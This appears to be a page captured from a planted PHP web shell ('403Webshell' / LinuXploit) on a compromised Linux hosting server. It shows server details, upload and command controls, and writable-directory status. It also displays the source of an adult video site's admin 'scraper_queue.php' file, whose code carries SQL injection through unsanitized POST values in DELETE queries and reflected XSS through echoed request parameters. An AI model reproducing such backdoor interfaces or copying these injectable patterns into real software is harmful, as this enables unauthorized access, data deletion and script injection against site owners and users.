403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/www.superporner.com/tube/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/www.superporner.com/tube/admin/scraper_queue.php
<? 
require "header.php"; 

if($_POST['list']) {
	foreach($_POST['list'] as $i) {
		mysql_query("DELETE FROM scraper_import WHERE record_num = '$i'") or die(mysql_error());
	}
}
?>

     <div id="right_column">
        <!-- RIGHT -->
        <div id="right_top">
        	<div id="right_home"></div>
            <div id="right_right">  
            <a href="index.php">Admin Home</a>          
            <span><a href="scraper_queue.php">Scraper Queue</a></span>  
            </div>
        </div>
        <div id="right_bg">
      		<h2>Scraper<strong>Queue</strong></h2>
            <div id="index_left" style='width: 100%;'>            
<? if($error) { ?><p><? echo $error; ?></p><? } ?>
<form id="form1" name="form1" method="post" action="">
<?
if(!isset($_GET['page']) || $_GET[page] == '') { 
	$page = 1; 
} else { 
	$page = $_GET['page']; 
}
if(!$_GET[setmax]) { $max_results = 500; } else { $max_results = $_GET[setmax]; }
$from = (($page * $max_results) - $max_results); 

$bgcolor = '#ffffff';

$result = mysql_query("SELECT * FROM scraper_import") or die(mysql_error());

$total_results = mysql_num_rows($result);
$total_pages = ceil($total_results / $max_results);
?>
<table width="750" border="0" align="center" cellpadding="3" cellspacing="0" class='pagetable'>
    <thead>
    <tr>
      <th align='left'>URL</th>
	  <th width="85" align="center">&nbsp;</th>
      <th width="20" align="center"><input type="checkbox" name="allbox" id="checkAll" onclick="CheckAll(document.form1)" /></th>
    </tr>
    </thead>
<?
while($row = mysql_fetch_array($result)) { 
	$videotitle = str_replace(' ','-',$row[title]); 
    $videotitle = str_replace("'",'',$videotitle);
    $videotitle = str_replace('"','',$videotitle);
    $videotitle = str_replace('&','and',$videotitle);
    $videotitle = strtolower($videotitle); 
 	$link = "/videos/$videotitle-$row[record_num].html";
?>
    <tr bgcolor = '<? echo $bgcolor; ?>'>
      <td valign="top" ><strong><? echo $row[url]; ?></strong></td>
	  <td align="center" valign="top" >
      </td>
	  <td align="center" valign="top"><input name="list[]" type="checkbox" class="style4" value="<? echo $row[record_num]; ?>" /></td>
    </tr>
<? 
if($bgcolor == '#ffffff') { $bgcolor = "#EBEBEB"; } else { $bgcolor = '#ffffff'; }
}
?>
</table>
<br />
<center><input type="submit" name="button" id="button" value="Remove Selected" />
</center>
<br />
  <center>
  <? 
if($page > 1){ 
			$prev = ($page - 1); 
			if($prev == 1) { $prev = '1'; }
			echo " <a style='font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold; color: #000000'  href=\"scraper_queue.php?page=$prev&setmax=$max_results&keywords=$_REQUEST[keywords]&niche=$_REQUEST[niche]&Submit2=true\">&laquo; Prev</a> / "; 
		} 
		
		for($i = 1; $i <= $total_pages; $i++){ 
			if(($page) == $i){ 
				echo "<span style='font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold;' >$i</span> / "; 
			} else { 
			if($i == 1) { $link = '1'; } else { $link = $i; }
			echo " <a style='font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold;'  href=\"scraper_queue.php?page=$link&setmax=$max_results&keywords=$_REQUEST[keywords]&niche=$_REQUEST[niche]&Submit2=true\">$i</a> / "; 
		} 
		} 

	// Build Next Link 
		if($page < $total_pages){ 
		$next = ($page + 1); 
		echo " <a style='font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold; color: #000000'  href=\"scraper_queue.php?page=$next&setmax=$max_results&keywords=$_REQUEST[keywords]&niche=$_REQUEST[niche]&Submit2=true\">Next &raquo;</a> "; 
		} 
?>
  </center>
</form>
            </div>
        </div>
        <div id="right_bottom"></div>
        </div>
</div>
</div>


      
        




<? require "footer.php"; ?>

Youez - 2016 - github.com/yon3zu
LinuXploit